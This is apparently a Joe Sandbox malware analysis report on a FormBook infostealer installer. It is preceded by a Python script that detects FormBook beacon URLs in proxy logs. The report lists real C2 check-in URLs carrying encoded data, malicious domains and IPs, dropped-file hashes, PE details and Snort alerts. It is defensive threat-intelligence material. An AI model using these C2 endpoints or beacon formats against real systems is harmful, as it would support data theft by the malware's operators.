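Every URL in this table has the same shape: a four-character directory (/nk6l/), one short query key carrying a long base64-like blob (Mn6p=...) and a second short key=value (m87=kDHx4bf), sent in turn to several hosts; www.rthearts.com carries the same path token without a query. FormBook builds carry a list of candidate domains and beacon to each of them; typically only one is live and the rest are decoys or unregistered, which is consistent with the 0% to 1% VirusTotal scores on the domains above. The following Python is an added example, not taken from the report or the malware, that flags URLs of this shape in proxy log lines and groups hosts by the shared path and key names so the whole rotation set is pulled out of the log together. The log lines are constructed around the report's URLs with invented timestamps, client addresses and status codes; the length thresholds in the regex are assumptions tuned to these samples.

```python
"""Flag FormBook-style beacon URLs in proxy log lines and pivot on the shared
path token. Constructed example: the PROXY_LOG lines are made up around the
URLs in the report; timestamps, client IPs and status codes are invented.

BEACON_RE encodes the shape seen in this report (short alphanumeric path
directory, a short query key carrying a long base64-like blob, then a second
short key=value). It is a triage heuristic, not a FormBook signature: the
literal path (nk6l) and keys (Mn6p, m87) change per build, so the rule keys on
structure, and the pivot below recovers the per-build literals from the log."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

BEACON_RE = re.compile(
    r"^https?://(?P<host>[^/\s]+)/(?P<path>[a-z0-9]{2,8})/\?"
    r"(?P<k1>[A-Za-z0-9]{2,8})=(?P<data>[A-Za-z0-9+/=]{32,})"
    r"&(?P<k2>[A-Za-z0-9_]{2,8})=(?P<v2>[A-Za-z0-9_]{4,12})$"
)

# format: <timestamp> <client> <method> <url> <status>
PROXY_LOG = """\
2022-01-14T03:40:12Z 192.168.2.5 GET http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf 200
2022-01-14T03:40:18Z 192.168.2.5 GET http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf 200
2022-01-14T03:40:25Z 192.168.2.5 GET http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf 404
2022-01-14T03:40:31Z 192.168.2.5 GET https://shops.myshopify.com/ 200
2022-01-14T03:41:02Z 192.168.2.7 GET https://www.example.com/search/?q=hello+world&page=2 200
"""


def parse_line(line: str) -> Tuple[str, str, str]:
    """Return (client, method, url) from one whitespace-separated log line."""
    _ts, client, method, url, _status = line.split()
    return client, method, url


def match_beacon(url: str) -> Optional[Dict[str, str]]:
    """Structural match; returns the named groups or None."""
    m = BEACON_RE.match(url)
    return m.groupdict() if m else None


def scan(log: str) -> List[Dict[str, str]]:
    """All GET requests in the log whose URL has the beacon shape."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        client, method, url = parse_line(line)
        m = match_beacon(url)
        if m and method == "GET":
            m["client"] = client
            hits.append(m)
    return hits


def pivot_by_campaign(hits: List[Dict[str, str]]) -> Dict[Tuple[str, str, str], List[str]]:
    """Group hosts by (path, first key, second key). FormBook cycles through
    its configured domains with the same path and keys, so hosts sharing the
    triple belong to one build even when most of them never answer."""
    groups: Dict[Tuple[str, str, str], List[str]] = defaultdict(list)
    for h in hits:
        key = (h["path"], h["k1"], h["k2"])
        if h["host"] not in groups[key]:
            groups[key].append(h["host"])
    return dict(groups)


if __name__ == "__main__":
    beacons = scan(PROXY_LOG)
    for key, hosts in pivot_by_campaign(beacons).items():
        print(f"path=/{key[0]}/ keys={key[1]},{key[2]} hosts={hosts}")
```

The structural match alone will also catch legitimate requests of the form `/api/?token=<long>&user=<short>`, so treat a single hit as low confidence and escalate on the pivot: several unrelated hosts sharing one path token and key pair inside a short window, or the requests originating from explorer.exe as in this report, is what separates a FormBook rotation from ordinary web traffic.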

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | nji3Lg1ot6.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | nji3Lg1ot6.exe | false | | high

                    Contacted IPs


                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.173.57 | www.alibabasdeli.com | United States | 13335 | CLOUDFLARENETUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
50.31.177.38 | nanasyhogar.com | United States | 23352 | SERVERCENTRALUS | true

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:552997
                    Start date:14.01.2022
                    Start time:03:36:23
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 11s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:nji3Lg1ot6 (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@8/4@4/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 24.2% (good quality ratio 21.8%)
                    • Quality average: 74.1%
                    • Quality standard deviation: 31.3%
                    HCA Information:
                    • Successful, ratio: 86%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nsx7FAE.tmp
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):252172
                    Entropy (8bit):7.750682379260983
                    Encrypted:false
                    SSDEEP:6144:118MKS5foIrwbBl2/IO4cwyjICBga9xtqS+W:0MKS5pwdQIC99xtqA
                    MD5:8644B9AA55DCA97B4841D7C3878444C7
                    SHA1:1B7CD31D5C9509868830982D39D9A3F75B7E3AD4
                    SHA-256:C41772CB8BD860959A61F832E221F9DC634BEBD8FE4CD141E45321E348EB4181
                    SHA-512:2DEE50DCEDF000EC57222C3D12B30F7905B18977C929C14517A0DC2937DA7B6CFF0D7FBB093059AE5607AB3C3341C856FEACD4CFAC23C89F20EBBFD50B174513
                    Malicious:false
                    Reputation:low
                    Preview: .X......,.......................,C.......X.......X..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):3.8072208508576035
                    Encrypted:false
                    SSDEEP:24:e31GSNNCc0teIAUdax/+TCA5dieD4ueeDFE8hueeYoNXs+f3SlLRQ0K7ABPnRuVL:CnC/I9GTxieBJInFbfGFN1RuqS
                    MD5:D62257B9F46BB3ECC454D94B80E839E8
                    SHA1:A33070571B7909CEB589F9CCEB8591EE2DAE5C9F
                    SHA-256:9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23
                    SHA-512:065531AFC2DA7DD6CECC893C13E41A1F15E0FC670E0DDC006E6F87CF5CB7A9B94D36275D2050953A11350590AC4D1B1B5FB89ACAA3C6B1F3F6C466D5E155F907
                    Malicious:false
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z-...C]..C]..C]Z.M]..C].}B\..C]..B]..C].nG\..C].nC\..C].n.]..C].nA\..C]Rich..C]........................PE..L......a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..<.................................................... ...............................text...Q........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..<....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\pawgjsvu
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4769
                    Entropy (8bit):6.209190395428905
                    Encrypted:false
                    SSDEEP:96:/s3+C1lu78g/85QphY5tVXUcbaLrVJ83Z/Lj+HNdC+cR3Sc3owy8WwXfUE/gmc01:i+CW8Q85ghY5tVkcbkU3hFdowyPwPUEX
                    MD5:2CF23E8F99E539C2CFA7DF0709FFE950
                    SHA1:B0DEF49E4CA1DE39D60696FFEC5EC6ECB9399D3C
                    SHA-256:C71C94E4AA37C19EE3E62E4F20D03CE4950D9B7BCA8755B3729CBDB7897B6FDE
                    SHA-512:0A028931CFE2F89C9324BA125DDFE576051CE68AFE556700D89EB74F0EC19DDBE1AB2C2E7AE96523CE231B47A18E5DB4935EF22E68F8708BC7663060F888D11E
                    Malicious:false
                    Reputation:low
                    Preview: ..aa\2...!zOV.,.a.V....L..V....L..,.a.LUiaaa.,.a^<.^<.4L.q.daaa(L.(\u^<.^<.4L.q..aaa(L.(\.^<.^<.4L.q..aaa(L.(\.^<.^<.4L.q..aaa(L.(\...]/+[.YR.jjL..(L.(\}2L..]..(L.(t.2L.2tU4]...[....2L.j\U4].(LUVO(,..}.[..aaaa.]=..,U^<..^<..^<. Y^<. .^<..^<....M.&I2..&I(e.A..`<.^<. .2L...(L.j,U.aaaa..=]Jaaa.]=..2,...2L....2...a\2.pp.V....L.2L.2a"L.ZA2L.2a2t.2..(\.2..](LU2L.2a!2t.(`2L.2\U2...a).k..9.aa.G.aa.a).^~...aa...aa.a)....m.aa.{.aa.a\2...i.V....L..L..aaa4L.(LU..aM.2LU.aa2LU!(LU2L.I(L..}...aa..M?2L..[..R.a(...(m.u4L..[....a(...(m.u[.[.YR.a4...q).^~..`aaq..d^^(L..4L.q^<..{^^^(L....aM..,.a..L.`aaa2L.2...]a\2...!.V....L..L.iaaa4L.(LU..aM.2LU.aa2LU!(LU2L.I(L..}..]aa....;aaa2L..[..R.a(...(m..2L..[....a(...(m..2L..[....(...(m..2L...[..R.j(...(e..4L..[.....(...(m..[.[.YR.a4...q).k...aaaq..U^^(L...aM.2L.2t.(`.^<.^<.^<.^<.^<..vW^^(L....aM..,.a..L.`aaa2L.2...a\2...5.L..aaa4L}(LU..aM.2LU.aa2LU!(LU2L.I(L..}.[jaa..M?2L..[..R.a(..}(m..2L..[....a(..}(m..[.[.YR.a4..}q)....faaaq.=U^^(L..^<
                    C:\Users\user\AppData\Local\Temp\zn2eyxxq9ww5zrdhr
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):220020
                    Entropy (8bit):7.992864927984938
                    Encrypted:true
                    SSDEEP:6144:7MKS5foIrwbBl2/IO4cwyjICBga9xtqS+Wx:7MKS5pwdQIC99xtqAx
                    MD5:A75D055E6FABC0D24984208FC2BD8877
                    SHA1:F4071D8B3141A30FC0D70787D174B8E31C6131FC
                    SHA-256:6497E85685A07951F80AE543BB730D7714717596140569E4D5C9388F2E6CBE59
                    SHA-512:3A09EEF95C13AF84D71512DBFCDB2C6D87412844443411E2235E47797E9582A12FEA44848E1037B7C56C60E233CC2EA962E59BEE917F13C60103B2B196A51F4E
                    Malicious:false
                    Reputation:low
                    Preview: .....r_..oJ...Pae...w.;.z..o../"j...p.$(<h...g....=.}4..y_e..+;...y...r......Q.._..p5$...q.......D..@....1...>G.`.OY...2.t=.)....o.....[P.u.>q.?O..........h..q......0.).Jn..%..r.M......U..,4.T.!/......N^........d....Kqt1G..G...;...k)`=@.Ow.>I.........vf.eF....:S...-"../"c...p.$(.h...g.,..=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).|.].E..r.H..G...A,.T.!/........V.h......d..H.Kq[1G.........k)`D@.Qw.>I..r......v..eFR...:S.+..o../"j...p.$(<h...g....=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).Jn..%..r,...G..m.A,4.T.!/.......NV........d..H.Kq[1G.........k)`D@.Qw.>I..r......v..eFR...:S.+..o../"j...p.$(<h...g....=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).Jn..%..r,...G..m.A,4.T.!/.......NV........d.

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.927911380419802
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:nji3Lg1ot6.exe
                    File size:248302
                    MD5:8eddcc35719034649f6947b2b08bcdf3
                    SHA1:5506b69b4584f43232f45299192a540ec0197998
                    SHA256:0d072a60b433f330d2ba97d75eae7af07e9d75bc6ed5b1065287661d05e82ab6
                    SHA512:c7716daafffd44dff6143d7fe0fb686eb5fc08da918aab204ae6d7c8687dc914d9310d488a2ffc4767e5fd643e8aee6d88fadf28d156c6be731c29bcc3943681
                    SSDEEP:6144:owzN+wRSsYU12O6NgFRQbIuoKFFmhmvk8nw:fN+w8KCWRbRKF7vkR
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                    File Icon

                    Icon Hash:b2a88c96b2ca6a72

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F1618B45960h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F1618B45617h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F1618B45605h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F1618B42E2Ch
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F1618B450F8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F1618B42E85h
                    cmp cl, 00000020h
                    jne 00007F1618B42E28h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F1618B42E1Ch
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94693169534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    Name | RVA | Size | Type | Language | Country
                    RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
                    RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
                    RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
                    RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
                    RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
                    RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                    Imports

                    DLL | Import
                    KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                    USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation system | Country where language is spoken
                    English | United States

                    Network Behavior

                    Snort IDS Alerts

                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    01/14/22-03:39:09.329226 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    01/14/22-03:39:09.329226 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    01/14/22-03:39:09.329226 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    01/14/22-03:39:09.373367 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49819 | 23.227.38.74 | 192.168.2.3

                    Network Port Distribution

                    TCP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jan 14, 2022 03:38:27.771661997 CET | 49793 | 80 | 192.168.2.3 | 50.31.177.38
                    Jan 14, 2022 03:38:27.889265060 CET | 80 | 49793 | 50.31.177.38 | 192.168.2.3
                    Jan 14, 2022 03:38:27.889566898 CET | 49793 | 80 | 192.168.2.3 | 50.31.177.38
                    Jan 14, 2022 03:38:27.889576912 CET | 49793 | 80 | 192.168.2.3 | 50.31.177.38
                    Jan 14, 2022 03:38:28.008744001 CET | 80 | 49793 | 50.31.177.38 | 192.168.2.3
                    Jan 14, 2022 03:38:28.376822948 CET | 49793 | 80 | 192.168.2.3 | 50.31.177.38
                    Jan 14, 2022 03:38:28.461199999 CET | 80 | 49793 | 50.31.177.38 | 192.168.2.3
                    Jan 14, 2022 03:38:28.461220026 CET | 80 | 49793 | 50.31.177.38 | 192.168.2.3
                    Jan 14, 2022 03:38:28.461890936 CET | 49793 | 80 | 192.168.2.3 | 50.31.177.38
                    Jan 14, 2022 03:38:28.461905003 CET | 49793 | 80 | 192.168.2.3 | 50.31.177.38
                    Jan 14, 2022 03:38:28.495172024 CET | 80 | 49793 | 50.31.177.38 | 192.168.2.3
                    Jan 14, 2022 03:38:28.495368004 CET | 49793 | 80 | 192.168.2.3 | 50.31.177.38
                    Jan 14, 2022 03:38:48.657919884 CET | 49808 | 80 | 192.168.2.3 | 172.67.173.57
                    Jan 14, 2022 03:38:48.675013065 CET | 80 | 49808 | 172.67.173.57 | 192.168.2.3
                    Jan 14, 2022 03:38:48.677712917 CET | 49808 | 80 | 192.168.2.3 | 172.67.173.57
                    Jan 14, 2022 03:38:48.677973032 CET | 49808 | 80 | 192.168.2.3 | 172.67.173.57
                    Jan 14, 2022 03:38:48.694858074 CET | 80 | 49808 | 172.67.173.57 | 192.168.2.3
                    Jan 14, 2022 03:38:48.705641031 CET | 80 | 49808 | 172.67.173.57 | 192.168.2.3
                    Jan 14, 2022 03:38:48.706160069 CET | 80 | 49808 | 172.67.173.57 | 192.168.2.3
                    Jan 14, 2022 03:38:48.706252098 CET | 49808 | 80 | 192.168.2.3 | 172.67.173.57
                    Jan 14, 2022 03:38:48.706278086 CET | 49808 | 80 | 192.168.2.3 | 172.67.173.57
                    Jan 14, 2022 03:38:48.723239899 CET | 80 | 49808 | 172.67.173.57 | 192.168.2.3
                    Jan 14, 2022 03:39:09.311626911 CET | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    Jan 14, 2022 03:39:09.328722000 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.328953028 CET | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    Jan 14, 2022 03:39:09.329226017 CET | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    Jan 14, 2022 03:39:09.346127987 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.373367071 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.373408079 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.373435974 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.373460054 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.373477936 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.373492002 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.373507023 CET | 80 | 49819 | 23.227.38.74 | 192.168.2.3
                    Jan 14, 2022 03:39:09.373677969 CET | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    Jan 14, 2022 03:39:09.373833895 CET | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    Jan 14, 2022 03:39:09.373939037 CET | 49819 | 80 | 192.168.2.3 | 23.227.38.74

                    UDP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jan 14, 2022 03:38:27.518068075 CET | 52650 | 53 | 192.168.2.3 | 8.8.8.8
                    Jan 14, 2022 03:38:27.765955925 CET | 53 | 52650 | 8.8.8.8 | 192.168.2.3
                    Jan 14, 2022 03:38:48.632225037 CET | 63297 | 53 | 192.168.2.3 | 8.8.8.8
                    Jan 14, 2022 03:38:48.656395912 CET | 53 | 63297 | 8.8.8.8 | 192.168.2.3
                    Jan 14, 2022 03:39:09.281239986 CET | 53615 | 53 | 192.168.2.3 | 8.8.8.8
                    Jan 14, 2022 03:39:09.309283972 CET | 53 | 53615 | 8.8.8.8 | 192.168.2.3
                    Jan 14, 2022 03:39:29.496071100 CET | 50728 | 53 | 192.168.2.3 | 8.8.8.8
                    Jan 14, 2022 03:39:29.602072954 CET | 53 | 50728 | 8.8.8.8 | 192.168.2.3

                    DNS Queries

                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                    Jan 14, 2022 03:38:27.518068075 CET | 192.168.2.3 | 8.8.8.8 | 0x7cdd | Standard query (0) | www.nanasyhogar.com | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:38:48.632225037 CET | 192.168.2.3 | 8.8.8.8 | 0x7e08 | Standard query (0) | www.alibabasdeli.com | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:39:09.281239986 CET | 192.168.2.3 | 8.8.8.8 | 0xd5ac | Standard query (0) | www.gigasupplies.com | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:39:29.496071100 CET | 192.168.2.3 | 8.8.8.8 | 0x1d40 | Standard query (0) | www.mnbvending.com | A (IP address) | IN (0x0001)

                    DNS Answers

                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
